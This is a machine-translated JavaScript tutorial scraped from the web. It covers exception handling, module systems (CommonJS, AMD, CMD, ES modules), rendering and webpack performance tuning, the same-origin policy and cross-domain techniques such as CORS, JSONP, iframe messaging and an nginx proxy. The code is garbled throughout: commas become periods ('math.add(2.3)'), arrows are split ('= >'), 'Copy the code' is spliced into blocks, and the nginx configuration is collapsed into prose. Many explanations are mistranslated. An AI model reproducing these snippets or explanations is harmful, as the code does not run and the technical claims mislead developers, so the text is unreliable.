preface
This is the last article in the series, and it covers some advanced JavaScript knowledge, as well as a review of the main points. If you are interested in JavaScript core Knowledge Summary (middle), you can watch it. It mainly covers functions, scopes, closures, prototype this and other contents.
Exception handling
Why handle exceptions
- Enhance the user experience;
- Remote location problem;
- Be proactive and find problems early;
- Unable to reproduce the problem, especially the mobile terminal, model, system are the problem;
- Perfect front-end solution, front-end monitoring system;
Which exceptions need to be handled
JS
Syntax error, code exceptionAJAX
Abnormal request- Static resource loading is abnormal
Promise
abnormalIframe
abnormal- Cross domain
Script error
- Crash and jam
Try-catch
Try-catch can catch only synchronous runtime errors, but not syntactic and asynchronous errors.
- Synchronous runtime error (available) :
try {
let name = 'jartto';
console.log(nam);
} catch(e) {
console.log('Exception caught:',e);
}
Copy the code
Output:
Exception caught: ReferenceError: Nam is not defined at <anonymous>:3:15Copy the code
- Syntax error (not allowed)
Let’s modify the code to drop a single quote:
try {
let name = 'jartto; console.log(nam); } catch(e) { console.log('Exception caught:',e);
}
Copy the code
Output:
Uncaught SyntaxError: Invalid or unexpected token
Copy the code
- Asynchronous error (not allowed)
try {
setTimeout(() = > {
undefined.map(v= > v);
}, 1000)}catch(e) {
console.log('Exception caught:',e);
}
Copy the code
Let’s take a look at the log:
Uncaught TypeError: Cannot read property 'map' of undefined
at setTimeout (<anonymous>:3:11)
Copy the code
No exceptions were caught, which is something we need to pay special attention to.
window.onerror
When a JS runtime error occurs, the window raises an error event from the ErrorEvent interface and executes window.onerror().
/ * * *@param {String} Message Error message *@param {String} Source Error file *@param {Number} Lineno line number *@param {Number} Colno column number *@param {Object} Error Error object (object) */
window.onerror = function(message, source, lineno, colno, error) {
console.log('Exception caught:',{message, source, lineno, colno, error});
}
Copy the code
Exceptions that can be caught:
- Synchronization runtime error
- Asynchronous runtime error
An exception that cannot be caught
- Grammar mistakes
- Request error
- Static resource error
This is pretty clear: in practice, onError is primarily used to catch unexpected errors, while try-catch is used to monitor specific errors in predictable situations, and the combination of the two is more efficient.
window.addEventListener
When a resource (such as an image or script) fails to load, the element that loaded the resource raises an error Event in the Event interface and executes the onError () handler on that element. These error events do not bubble up to Windows, but (at least in Firefox) can be caught by a single Window.addeventListener.
<script>
window.addEventListener('error'.(error) = > {
console.log('Exception caught:', error);
}, true)
</script>
<img src="./jartto.png">
Copy the code
Console output:
Because network request exceptions do not bubble, they must be captured in the capture phase. However, although this method can capture network request exceptions, it cannot determine whether the HTTP status is 404 or other such as 500, so it needs to cooperate with server logs to conduct investigation and analysis.
Promise Catch
Using a catch in a promise makes it very easy to catch an asynchronous error.
Errors thrown in promises without a catch cannot be caught by onError or try-catch, so it is important to remember to include a catch in a Promise to handle exceptions thrown.
To prevent missed Promise exceptions, it is recommended to add a global listener on unhandledrejection to globally listen for Uncaught Promise errors. Usage:
window.addEventListener("`unhandledrejection`".function(e){
console.log(e);
});
Copy the code
modular
CommonJs
The CommonJS API fills this gap by defining the apis used by many common applications, mainly non-browser applications. Its ultimate goal is to provide a standard library similar to Python, Ruby, and Java. That way, developers can use the CommonJS API to write applications that can then run in different JavaScript interpreters and different host environments.
Node.js module system is implemented by referring to CommonJS specification. In CommonJS, there is a global method require() for loading modules. For example, to load a math.js, you can do this
var math = require('math')
// Then you can call the methods in Math
math.add(2.3)/ / 5
Copy the code
CommonJS defines modules as:
- Module reference —
require
— Used to import external modules - Module definition —
exports
— The method or variable used to export the current module - Module id —
module-
— represents the module itself
CommonJS principle and simple implementation
A simple example
var module = {
exports: {}}; (function(module.exports) {
exports.multiply = function (n) { return n * 1000}; } (module.module.exports))
var f = module.exports.multiply;
f(5) / / 5000
Copy the code
The above code provides module and exports external variables to an immediate function that houses the module. The module’s output is placed in module.exports, which allows the module to be loaded.
The realization of the Browserify
Browserify is currently the most commonly used CommonJS format conversion tool.
See an example where the main.js module loads the foo.js module.
// foo.js
module.exports = function(x) {
console.log(x);
};
// main.js
var foo = require("./foo");
foo("Hi");
Copy the code
Using the following command, you can convert main.js into a browser-usable format.
$ browserify main.js > compiled.js
What exactly does Browserify do? Install browser-Unpack and you’ll see.
$ npm install browser-unpack -g
Then, unpack the previously generated compile.js.
$ browser-unpack < compiled.js
[{"id":1."source":"module.exports = function(x) {\n console.log(x);\n};"."deps":{}
},
{
"id":2."source":"var foo = require(\"./foo\"); \nfoo(\"Hi\");"."deps": {"./foo":1},
"entry":true}]Copy the code
As you can see, Browserify puts all modules into an array, with the ID attribute being the module number, the source attribute being the module source, and the DEPS attribute being the module’s dependencies.
Since foo.js is loaded in main.js, the deps attribute specifies that./foo corresponds to module 1. The browser executes the source property of module 1 and outputs the value of module.exports when it encounters require(‘./foo’).
AMD
With nodeJS based on the commonJS specification, the concept of server modules has been formed, and it is natural that people want client modules. And preferably compatible, one module will run on both the server and the browser without modification. However, there is a major limitation that makes the CommonJS specification unsuitable for the browser environment. Again, the code above has a big problem if it runs in a browser. Can you tell?
var math = require('math'); math.add(2.3);
Copy the code
The second line math.add(2, 3) runs after the first line require(‘math’), so must wait for math.js to finish loading. That is, if it takes a long time to load, the entire application will just sit there and wait. You’ll notice that require is synchronized.
This is not a problem on the server because all modules are stored on the local hard disk and can be loaded synchronously, and the wait time is the hard disk read time. For browsers, however, this is a big problem because modules are on the server side and the wait time can be long depending on the speed of the network, leaving the browser in a state of “suspended animation”.
Therefore, browser-side modules cannot be synchronous, they can only be asynchronous. This is the background from which the AMD specification was born.
CommonJS is mainly for the performance of JS in the back end, it is not suitable for the front end, AMD(asynchronous module definition) emerged, it is mainly for the performance of front-end JS specification.
AMD stands for “Asynchronous Module Definition”. It loads modules asynchronously without affecting the execution of subsequent statements. All statements that depend on this module are defined in a callback function that will not run until the load is complete.
AMD also uses the require() statement to load modules, but unlike CommonJS, it requires two arguments:
require([module], callback);
Copy the code
The first argument, [module], is an array whose members are the modules to be loaded. The second argument, callback, is the callback function after the successful loading. If you rewrite the previous code to AMD form, it looks like this:
require(['math'].function (math) { math.add(2.3); });Copy the code
Take RequireJS as an example to illustrate the AMD specification
Why require.js?
In the early days, all the Javascript code was written in a single file, and it was enough to load that single file. Later, more and more code, one file is not enough, must be divided into multiple files, load one after another. The following page code, I believe many people have seen.
<script src="1.js"></script><script src="2.js"></script>
<script src="3.js"></script>
<script src="4.js"></script>
<script src="5.js"></script>
<script src="6.js"></script>
Copy the code
This code loads multiple JS files in turn.
There are major disadvantages to writing this way. First, when loading, the browser will stop rendering the page, and the more files loaded, the longer the page will be unresponsive. Secondly, due to the dependency relationship between JS files, the loading sequence must be strictly guaranteed (for example, 1.js should be in front of 2.js), and the module with the largest dependency must be loaded last. When the dependency relationship is very complex, the writing and maintenance of the code will become difficult.
Require.js was created to solve these two problems:
1. Implement asynchronous loading of JS files to avoid losing response of web pages
2. Manage the dependency between modules, easy to write and maintain the code
AMD && CMD
For dependent modules, AMD executes early and CMD executes late. Since 2.0, however, RequireJS has also been deferred (handled differently depending on how it is written). CMD advocates as lazy as possible.
CMD advocates dependency nearby, AMD advocates dependency front. Look at the code:
// CMD
define(function(require.exports.module) {
var a = require('./a')
a.doSomething()
// Omit 100 lines here
var b = require('./b') // Dependencies can be written nearby
b.doSomething()
// ...
})
// AMD's default recommendation is
define(['./a'.'./b'].function(a, b) { Dependencies must be written in the beginning
a.doSomething()
// Omit 100 lines here
b.doSomething()
...
})
Copy the code
Although AMD also supports CMD and requires as a dependency, RequireJS authors prefer it by default and it is the default module definition in the official documentation.
AMD API default is a when multiple use, CMD API strictly differentiated, advocating a single responsibility. For example, in AMD, require is divided into global require and local require, both called require. In CMD, there is no global require, but according to the completeness of the module system, seajs.use is provided to realize the loading and starting of the module system. In CMD, every API is simple and pure.
ES6 Module
- The command
-
Export: specifies the external interface of the module
- Default export:
export default Person
(You can specify any module name when importing, without knowing the real internal name) - Export separately:
export const name = "Bruce"
- Export on demand:
export { age, name, sex }
(recommended) - Rename export:
export { name as newName }
- Default export:
-
Import: Imports internal functions of modules
- Default import:
import Person from "person"
- Overall import:
import * as Person from "person"
- Import on demand:
import { age, name, sex } from "person"
- Rename import:
import { name as newName } from "person"
- Directed by:
import "person"
- Compound import:
import Person, { name } from "person"
- Default import:
-
Compound mode: The export command and import command are combined in one line. The variables are not imported into the current module, which is equivalent to the external forwarding interface. As a result, the current module cannot directly use the imported variables
- Default import/export:
export { default } from "person"
- Overall import and export:
export * from "person"
- Import and export on demand:
export { age, name, sex } from "person"
- Rename import/export:
export { name as newName } from "person"
- Named change default import/export:
export { name as default } from "person"
- Default change named import/export:
export { default as name } from "person"
- Default import/export:
-
Difference between CommonJS and ESM
-
Copy of CommonJS output, reference to ESM output
CommonJS
Once a value is output, changes within the module do not affect that valueESM
A variable in a module is bound to the module in which it resides. When the script is actually executed, the value of this read-only reference is evaluated in the loaded module
-
CommonJS is loaded at run time, ESM is loaded at compile time
- CommonJS load modules are objects (i.e
module.exports
), this object will only be generated after the script runs - An ESM load module is not an object, and its external interface is a static definition that is generated during the code static parsing phase
- CommonJS load modules are objects (i.e
Cyclic loading
-
Definition: The execution of script A depends on script B, and the execution of script A depends on script B
-
Loading principle
-
CommonJS: require() executes the entire script the first time the script is loaded, generates an object in memory and caches it, and fetches it directly from the cache the second time the script is loaded
-
The ESM: import command load variable is not cached, but instead becomes a reference to the loaded module
-
Cyclic loading
-
CommonJS: Outputs only the parts that have been executed, not the parts that have not been executed
-
ESM: The developer needs to ensure that the value can be obtained when the value is actually evaluated (the variable can be written as a function, which can promote the function)
Performance optimization
The directions of performance optimization are as follows:
- Write high-performance
JavaScript
- Browser rendering
- Network optimization
- Package tool optimization to
webpack
As an example
Write high-performance JavaScript
Common coding specifications
- will
js
Scripts are placed at the bottom of the page to speed up rendering - will
js
Scripts package scripts into groups to reduce requests - Download using a non-blocking mode
js
The script - Try to use local variables to hold global variables
- Follow a strict pattern:
"use strict"
; - Use closures as little as possible
- Reduce object member nesting
- The cache
DOM
The node access - Avoid the use of
eval()
andFunction()
The constructor - Create objects and arrays using direct fetches whenever possible
- Minimize redraw (
repaint
) and reflux (reflow
)
Why put JS at the end of the body?
If JS needs to bind to the DOM, it will not bind to the DOM if it is not properly handled in the header
The **JS engine exists independently of the rendering engine. ** Our JS code is executed wherever it is inserted in the document. When the HTML parser encounters a Script tag, it pauses the rendering process and gives control to the JS engine. The JS engine will execute the inline JS code directly, and the external JS file must first get the script, and then execute. Once the JS engine is finished running, the browser will return control to the rendering engine and continue to build CSSOM and DOM.
The browser lets JS block other activities because it doesn’t know what changes JS is going to make, and it’s afraid of chaos if it doesn’t block subsequent operations.
Conclusion:
- If the JS is in the header, the browser blocks and waits for the JS to load and execute
- If JS is at the end of the body, the browser does an early rendering to bring the first screen forward
Reference the demo: perform/performance optimization/testDemo slowServer/index. Js, pay attention to check the terminal
Asynchronous loading of non-core code
- Dynamic script loading
- use
JS
To create ascript
The tag is then inserted into the page
- use
- Defer (IE)
- The entire HTML file is parsed before it is executed. If there are more than one HTML file, it is executed in the order of loading
- async
- Execute immediately after the load is complete. If there are multiple loads, the execution is independent of the loading sequence
The header of the meta
Compatibility configuration, let IE use the highest Edge rendering, chrome rendering if you have Chrome.
<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
Copy the code
If the browser is dual-core, the WebKit engine is preferred
<meta name="render" content="webkit">
Copy the code
Lazy loading
The principle of lazy loading is to load only what needs to be loaded in a custom area (usually a viewable area, but it can also be a viewable area soon). For the image, first set the SRC attribute of the image label to a placeholder map or empty, put the real image resources into a custom attribute, when entering the custom area, the custom attribute will be replaced by the SRC attribute, so that the image will download resources, realize the lazy loading of the image.
Browser rendering
HTML is parsed to generate a DOM tree; The CSS is parsed to generate Style Rules. The combination produces the Render Tree. Use layout to calculate the width, height, position, and color of the DOM display. And then render it on the interface, and the user sees it
The browser rendering process:
- Parse THE HTML to build the DOM (tree) and request CSS /image/ JS in parallel
- Download the CSS file and start building the CSSOM (CSS tree)
- After CSSOM is built, generate the Render tree with the DOM
- Layout: Calculates the position of each node on the screen
- Display: Painting a page on the screen using a graphics card
DOM tree vs. render tree
DOM
Tree andHTML
Labels correspond one to one, includinghead
And hidden elements- Rendering trees are not included
head
And hidden elements, each line of a large piece of text is a separate node, and each node has a correspondingcss
attribute
Does CSS block DOM parsing
For an HTML document, CSS, whether inline or linked, blocks subsequent DOM rendering, but not subsequent DOM parsing
When the CSS file is placed in , CSS parsing also blocks subsequent DOM rendering, but CSS parsing also parses the DOM, so the page is rendered gradually after CSS parsing is complete
What is the difference and relationship between redraw and rearrangement?
- Redraw: Redraw occurs when the appearance of elements in the rendered tree (e.g. color) changes without affecting the layout
- Backflow: Redraw backflow occurs when the layout of elements in the render tree (e.g. size, position, hidden/state state) changes
- Note: JS fetch
Layout
Attribute values (e.g.offsetLeft
,scrollTop
,getComputedStyle
Etc.) can also cause reflux. Because the browser needs to backflow to calculate the latest value - Backflow will certainly cause redrawing, and redrawing will not necessarily cause backflow
Each element in the DOM structure has its own box, which requires the browser to calculate and place the element in its proper place according to various styles, a process called reflow
Trigger reflow
- Add or remove visible DOM elements.
- Element position changes.
- Changes in the size of an element (including changes in internal and external margins, border thickness, width, height, etc.).
- Content changes.
- The page renderer is initialized.
- Browser window size changed.
Solutions:
-
When you need to perform complex operations on a DOM element, hide it (display:” None “) and display it after the operation is complete
-
When multiple DOM nodes need to be created, use the DocumentFragment to add the Document in one go, or use the string concatenation method to construct the corresponding HTML and then use innerHTML to modify the page
-
Cache Layout property values, such as var left = em.offsetLeft; In this way, multiple uses of left produce only one reflux
-
Avoid table layouts (a table element that triggers backflow causes all other elements in the table to backflow)
-
Avoid USING CSS expressions because each call recalculates the value (including loading the page)
-
Use CSS abbreviations as far as possible. For example, use border instead of border-width, border-style, border-color
-
Batch change element styles: elem. ClassName and elem. Style. CssText instead of elem. Style
Network optimization
Merge resource files to reduce HTTP requests
Browser concurrent HTTP request is made by quantitative restrictions (such as desktop browser concurrent requests may be eight, mobile browser is 6), if all of a sudden dozens of concurrent request so there will be many stops, etc., such as the previous request good the next to go in, thus extend the whole page load time
Compress the resource file to reduce the request size
The smaller the file size, of course, the faster it loads. The code can be compressed to remove whitespace, comments, variable substitutions, and the size of the resource file can also be reduced by using compression methods such as gzip during transfer.
Classification of cache
- Strong cache
- Read directly from the browser cache without going to the background to check whether expiration
Expire
Expiration timeCache-Control:max-age=3600
Expiration of seconds
- Negotiate the cache
- Check in the background every time you use the cache
Last-Modified
If-Modified-Since
Last modified timeEtag
If-None-Match
- How to distinguish
- Is it set
no-cache
- Is it set
Use the cache mechanism to minimize requests whenever possible
The browser has a caching mechanism. When returning a resource, set a cache-control expiration time. Within the expiration time, the browser uses the local cache by default.
There are problems with caching, however, because web development is phased and a new version is released every once in a while. Because HTTP requests are located by URL, if the url of the resource file name has not changed then the browser will still use the cache. What if? A cache update mechanism is needed to give the modified file a new name. The easiest way to do this is to put a timestamp after the URL, but this will result in retrieving all new resources as soon as a new version is released. A popular modern method is to compute a hash value based on the file, which changes as the file is updated. When the browser gets the file it will request a new file if the file name is updated.
The DNS resolution beforehand
Modern browsers do two things on DNS Prefetch:
-
After downloading the HTML source code, it will parse the tag containing the link on the page and query the corresponding domain name in advance
-
For visited pages, the browser keeps a list of domain names and, when opened again, resolves DNS while the HTML is downloaded
Automatic parsing
The browser uses the href attribute of the hyperlink to find the host name to be preresolved. When an A tag is encountered, the browser automatically resolves the domain name in the href to an IP address, in parallel with the user browsing the web page. However, to ensure security, there is no automatic parsing in HTTPS pages
Manual parsing
Preresolving a domain name<link rel="dns-prefetch" href="//img.alicdn.com">Forcibly enable DNS preresolution in HTTPS<meta http-equiv="x-dns-prefetch-control" content="on">
Copy the code
CDN
The principle of CDN is to distribute room cache data as widely as possible.
Therefore, we can use CDN to load static resources as much as possible. As the browser has the upper limit of concurrent requests for a single domain name, we can consider using multiple CDN domain names. In addition, it is necessary to pay attention to the CDN domain name to be different from that of the master site when loading static resources. Otherwise, each request will bring cookies of the master site and consume traffic in vain.
preload
In development, you might encounter situations like this. You can use preloading when you don’t need resources right away but want them as early as possible.
Preloading is a declarative fetch that forces the browser to request resources and does not block the onload event. You can use the following code to enable preloading.
Preloading can reduce the loading time of the first screen to some extent, because some important files that do not affect the first screen can be loaded later. The only disadvantage is poor compatibility.
<link rel="preload" href="http://example.com">
Copy the code
pre-rendered
The downloaded files can be pre-rendered in the background by pre-rendering, which can be turned on using the following code.
Image optimization
- No pictures. A lot of times will use a lot of modified pictures, in fact, this kind of modified pictures can be used
CSS
To replace. - For mobile terminals, the image does not need to load the original image, can request a cropped image
- Use the picture
base64
format - Combine multiple icon files into one image (Sprite image)
- Use the correct image format
- For being able to display
WebP
Format the browser as much as possibleWebP
Format. becauseWebP
The format has better image data compression algorithm, can bring smaller image volume, and has naked eye recognition of the image quality without difference, the disadvantage is not good compatibility - Lots of use of color
JPEG
- The use of less color variety
PNG
Some are availableSVG
Instead of
- For being able to display
Optimization of webpack
The main optimization ideas are as follows:
- What are the ways you can reduce it
Webpack
Packing time - What are the ways in which
Webpack
The bags are smaller
Reduce the size of packaged files
According to the need to load
If we pack all the pages into a SINGLE JS file, we merge multiple requests, but also load a lot of unnecessary code, which takes longer. In order for the homepage to be presented to the user more quickly, we definitely want the file size of the homepage to be loaded as small as possible. In this case, we can use on-demand loading and package each routing page as a separate file.
Tree Shaking
Tree Shaking can remove unreferenced code from a project, for example
// test.js
export const a = 1
export const b = 2
// index.js
import { a } from './test.js'
Copy the code
In the above case, variable B in the test file is not packaged into the file if it is not used in the project.
If you are using Webpack 4, this optimization will automatically start when you start production.
Scope Hoisting
Scope will analyze the dependencies between modules and combine the packaged modules into a function as much as possible. Let’s say we want to package two files
// test.js
export const a = 1
// index.js
import { a } from './test.js'
Copy the code
In this case, our packaged code would look something like this
[
/* 0 */
function (module.exports.require) {
/ /...
},
/ * 1 * /
function (module.exports.require) {
/ /...}]Copy the code
However, if we use Scope collieries, the code will merge as much as possible into a function, and it will become something like this
[
/* 0 */
function (module.exports.require) {
/ /...}]Copy the code
The sample packaging method generates significantly less code than the previous one. If you want to open this function in the Webpack4, only need to enable optimization. ConcatenateModules is ok.
module.exports = {
optimization: {
concatenateModules: true}}Copy the code
Speed up packing
Optimize the Loader
For Loader, Babel is the first to affect packaging efficiency. Because Babel converts code into strings to generate an AST (abstract syntax tree), and then continues to transform the AST to generate new code, the larger the project, the more code it transforms, the less efficient it becomes. Of course, there are ways to optimize.
First, we can reduce the file search scope of Loader
module.exports = {
module: {
rules: [{// Babel is used for js files
test: /\.js$/,
loader: 'babel-loader'.// Only look in the SRC folder
include: [resolve('src')].// The path that will not be looked up
exclude: /node_modules/}}}]Copy the code
You can also cache Babel compiled files so that you only need to compile the changed code files next time, greatly speeding up the packaging time.
loader: 'babel-loader? cacheDirectory=true'Copy the code
HappyPack
Due to the fact that Node is single-threaded, Webpack is also single-threaded during packaging, especially during Loader execution, which leads to a waiting situation.
HappyPack can convert Loader synchronous execution to parallel, which makes full use of system resources to speed up packaging
module: {
loaders: [{test: /\.js$/,
include: [resolve('src')].exclude: /node_modules/.// The content after id corresponds to the following
loader: 'happypack/loader? id=happybabel'}},plugins: [
new HappyPack({
id: 'happybabel'.loaders: ['babel-loader? cacheDirectory'].// Start 4 threads
threads: 4})]Copy the code
DllPlugin
DllPlugin can pre-package and import specific class libraries. This approach greatly reduces the number of times that libraries need to be repackaged only when they are updated, and also optimizes the separation of common code into separate files.
// Separate configuration in a file
// webpack.dll.conf.js
const path = require('path')
const webpack = require('webpack')
module.exports = {
entry: {
// The class library that you want to pack uniformly
vendor: ['react']},output: {
path: path.join(__dirname, 'dist'),
filename: '[name].dll.js'.library: '[name]-[hash]'
},
plugins: [
new webpack.DllPlugin({
// Name must be the same as output.library
name: '[name]-[hash]'.// This attribute needs to be consistent with the DllReferencePlugin
context: __dirname,
path: path.join(__dirname, 'dist'.'[name]-manifest.json')]}})Copy the code
We then need to execute this configuration file to generate the dependency files, which we then need to introduce into the project using the DllReferencePlugin
// webpack.conf.js
module.exports = {
/ /... Omit other configurations
plugins: [
new webpack.DllReferencePlugin({
context: __dirname,
// Manifest is the json file that was packaged earlier
manifest: require('./dist/vendor-manifest.json'),}})]Copy the code
Code compression
In Webpack3, we generally use UglifyJS to compress the code, but this is a single thread. In order to speed up the efficiency, we can use webpack-parallel-Uglify-plugin to run UglifyJS in parallel, thus improving the efficiency.
In Webpack4, we don’t need to do this, we just need to set mode to production to enable this function by default. Code compression is also a performance optimization we must do, of course we can compress not only JS code, but also HTML, CSS code, and in the process of compressing JS code, we can also configure to delete console.log code such as functions.
Some small optimization points
resolve.extensions
This is used to indicate a list of file suffixes. The default search order is [‘.js’, ‘.json’], which will be used if your imported files are not suffixed. The list should be as short as possible, and the most frequent suffixes should be placed firstresolve.alias
You can alias a path to make it easier for Webpack to find the pathmodule.noParse
If you are sure that there are no other dependencies under a file, you can use this property to keep Webpack from scanning the file, which is useful for large libraries
Web security
Common security problems on the Web are as follows:
- The same-origin policy
- XSS cross-site scripting attacks
- CSRF cross-site request forgery
The same-origin policy
Originally, it meant that the Cookie set by page A could not be opened on page B unless the two pages were “cognate”. “Homology” means “three of the same”.
- The agreement is the same
- Domain name is the same
- The same port
purpose
The purpose of the same origin policy is to ensure the security of user information and prevent malicious websites from stealing data.
Consider this situation: Site A is A bank, and the user logs in and then goes to another site. What happens if other websites can read the cookies of WEBSITE A?
Obviously, if a Cookie contains privacy (such as the amount of money deposited), this information will be disclosed. What’s more, cookies are often used to save the user’s login status. If the user does not log out, other websites can pretend to be the user and do whatever they want. Because browsers also specify that submitting forms is not subject to the same origin policy.
Therefore, the same origin policy is necessary, otherwise cookies can be shared and the Internet is not safe at all.
limits
(1) Cookies, LocalStorage, and IndexDB cannot be read.
(2) DOM cannot be obtained.
(3) AJAX requests cannot be sent.
Cross-domain solutions
- CORS
- JSONP
- document.domain+iframe
- location.hash+iframe
- window.name+iframe
- postMessage
- WebSocket
- The node middleware
- Nginx proxy
CORS Cross-domain resource request
Cross-origin Resource Sharing (CORS) Cross-domain resource requests
When a browser requests a cross-domain resource for a cross-domain Ajax request, it adds an Origin field to the header of the request, but it does not know whether the resource server allows cross-domain requests. The browser sends it to the server, and if the server returns no ‘access-Control-allow-origin ‘:’ url or * ‘in the header, the browser ignores the request and reports an error at the console
CORS limit
Allowed request methods
GET
POST
HEAD
Allow the content-type
text/plain
multipart/form-data
application/x-www-form-urlencoded
Other types of request methods and Content-Types need to pass pre-request validation before being sent
CORS requests in advance
CORS,
Cross-domain resource sharing standards have added a new set of HTTP header fields that allow servers to declare which source sites have access to which resources. In addition, the specification requires that for HTTP request methods that may have adverse effects on server data (especially HTTP requests other than GET, or POST requests with certain MIME types), the browser must first initiate a precheck request using the OPTIONS method.
After the server adds the method and content-type to the HTTP header, the other specified methods and content-type can be successfully requested
'access-control-allow-headers ':' content-type ' 'access-control-allow-methods ':' access-Control-max-age ': Headers': 'content-type' 'access-Control-allow-methods ':' access-Control-max-age ': 'Pre-requested time to allow transfer of other methods and types'Copy the code
The json cross-domain
Browsers have same-origin restrictions, but they allow cross-domain requests for things like script tags, link tags, img tags, and iframe tags loaded with SRC addresses.
So the principle of JSONP is:
- To create a
script
Tag, this onescript
Of the labelsrc
Is the requested address; - this
script
Tag inserted intoDOM
The browser is based onsrc
Address access to server resources - The returned resource is a text, but because it is in a Script tag, the browser executes it
- This text happens to be in the form of a function call, the function name (data), which the browser executes as JS code that calls the function
- As long as the name of the function is specified in advance, and the function exists in
window
Object, you can pass data to the handler.
document.domain+iframe
The primary domain must be the same and the subdomains must be different
The parent window: www.domain.com/a.html
<iframe id="iframe" src="http://child.domain.com/b.html"></iframe>
<script>
document.domain = 'domain.com';
var user = 'admin';
</script>
Copy the code
Child window: child.domain.com/b.html
<script>
document.domain = 'domain.com';
// Get the variables in the parent window
alert('get js data from parent ---> ' + window.parent.user);
</script>
Copy the code
location.hash + iframe
Implementation principle: A wants to communicate with B across domains, which is achieved through the middle page C. Three pages, different fields use iframe location.hash to transfer values, the same fields directly js access to communicate.
A domain: A.html -> B domain: B.html -> A domain: C.HTML, A and B different domain can only hash value one-way communication, B and C are also different domain can only one-way communication, but C and A are the same domain, so C can access all objects on A page through parent. Parent.
1.) A.HTML (www.domain1.com/a.html)
<iframe id="iframe" src="http://www.domain2.com/b.html" style="display:none;"></iframe>
<script>
var iframe = document.getElementById('iframe');
// Pass hash values to B.html
setTimeout(function() {
iframe.src = iframe.src + '#user=admin';
}, 1000);
// callback methods open to homologous C.HTML
function onCallback(res) {
alert('data from c.html ---> ' + res);
}
</script>
Copy the code
2.) B.HTML (www.domain2.com/b.html)
<iframe id="iframe" src="http://www.domain1.com/c.html" style="display:none;"></iframe>
<script>
var iframe = document.getElementById('iframe');
// listen for hash values from A.html and pass them to C.HTML
window.onhashchange = function () {
iframe.src = iframe.src + location.hash;
};
</script>
Copy the code
3.) C. HTML (www.domain1.com/c.html)
<script>
// Listen for hash values from B.html
window.onhashchange = function () {
// Return the result by manipulating the javascript callback of the same domain A.html
window.parent.parent.onCallback('hello: ' + location.hash.replace('#user='.' '));
};
</script>
Copy the code
window.name + iframe
The window.name attribute is unique in that the name value persists across different pages (and even different domain names) and supports very long name values (2MB).
1.) A.HTML (www.domain1.com/a.html)
var proxy = function(url, callback) {
var state = 0;
var iframe = document.createElement('iframe');
// Load the cross-domain page
iframe.src = url;
// The onload event fires twice, the first time the cross-domain page is loaded and the data is stored in window.name
iframe.onload = function() {
if (state === 1) {
// After the second onload(syndomain proxy page) succeeds, the data in syndomain window.name is read
callback(iframe.contentWindow.name);
destroyFrame();
} else if (state === 0) {
// After the first onload succeeds, switch to the same-domain proxy page
iframe.contentWindow.location = 'http://www.domain1.com/proxy.html';
state = 1; }};document.body.appendChild(iframe);
// After the data is retrieved, the iframe is destroyed to free memory; This also ensures security (not accessed by other fields frame JS)
function destroyFrame() {
iframe.contentWindow.document.write(' ');
iframe.contentWindow.close();
document.body.removeChild(iframe); }};// Request cross-domain B page data
proxy('http://www.domain2.com/b.html'.function(data){
alert(data);
});
Copy the code
2.) proxy. HTML: (www.domain1.com/proxy… Intermediate proxy page, same domain as A.HTML, content is empty.
3.) B.HTML (www.domain2.com/b.html)
<script>
window.name = 'This is domain2 data! ';
</script>
Copy the code
Summary: The SRC attribute of iframe is used to pass the data from the outfield to the local region. The cross-domain data is passed from the outfield to the local region by the window.name of iframe. This is a neat way to circumvent the browser’s cross-domain access restrictions, but it’s also a secure operation.
PostMessage cross-domain
PostMessage is an API in HTML5 XMLHttpRequest Level 2, and is one of the few window properties that can operate across domains. It can be used to solve the following problems:
- Data transfer between the page and the new window it opens
- Messaging between multiple Windows
- Page with nested IFrame message delivery
- Cross-domain data transfer for the three scenarios above
Usage: The postMessage(data, Origin) method takes two arguments
data
The HTML5 specification supports any primitive type or copiable object, but some browsers only support strings, so it’s best to use them when passing argumentsJSON.stringify()
Serialization.origin
: Protocol + host + port number. The value can also be “*”, which indicates that the message can be sent to any window. If you want to specify the same source as the current window, set this parameter to “/”.
1.) A.HTML (www.domain1.com/a.html)
<iframe id="iframe" src="http://www.domain2.com/b.html" style="display:none;"></iframe>
<script>
var iframe = document.getElementById('iframe');
iframe.onload = function() {
var data = {
name: 'aym'
};
// Send cross-domain data to domain2
iframe.contentWindow.postMessage(JSON.stringify(data), 'http://www.domain2.com');
};
// Accept data from domain2
window.addEventListener('message'.function(e) {
alert('data from domain2 ---> ' + e.data);
}, false);
</script>
Copy the code
2.) B.HTML (www.domain2.com/b.html)
<script>
// Receive data from domain1
window.addEventListener('message'.function(e) {
alert('data from domain1 ---> ' + e.data);
var data = JSON.parse(e.data);
if (data) {
data.number = 16;
// Send it back to domain1
window.parent.postMessage(JSON.stringify(data), 'http://www.domain1.com'); }},false);
</script>
Copy the code
WebSocket communicates across domains
var ws = new WebSocket('wss://echo.websoket.org') // This is the back-end port
ws.onopen = function(evt) {
ws.send('some message')
}
ws.onmessage = function (evt) {
console.log(evt.data);
}
ws.onclose = function(evt){
console.log('Connection closed');
}
Copy the code
Nginx agents cross domains
- Nginx configuration resolves iconFONT across domains
Browser cross-domain access js, CSS, and img conventional static resources are the same-origin policy permission, but iconfont font file (eot | otf | the vera.ttf | woff | SVG) exception, at this time in nginx server to add the following configuration static resources. location / { add_header Access-Control-Allow-Origin *; }
- Nginx reverse proxy interfaces cross domains
Cross-domain principle: The same Origin policy is a security policy of the browser, not a part of the HTTP protocol. The server invokes the HTTP interface only using THE HTTP protocol, and does not execute JS scripts. There is no need for the same origin policy, so there is no crossing problem. Nginx configure a proxy server (domain name and domain1 the same, different port) as a jumper, reverse proxy access to domain2 interface, and can incidentally modify the cookie in the domain information, convenient for the current domain cookie writing, cross-domain login. Nginx: ‘ ‘#proxy server {listen 81; server_name www.domain1.com;
location / { proxy_pass http://www.domain2.com:8080; # reverse proxy proxy_cookie_domain www.domain2.com www.domain1.com; # change cookie domain name index index.html index.htm; # When accessing Nignx with middleware proxy interface such as Webpack-dev-server, there is no browser participation, so there is no source restriction. Add_header access-Control-allow-origin http://www.domain1.com; * add_header access-control-allow-credentials true; * add_header access-control-allow-credentials true; }} ` ` `Copy the code
- Examples of front-end code:
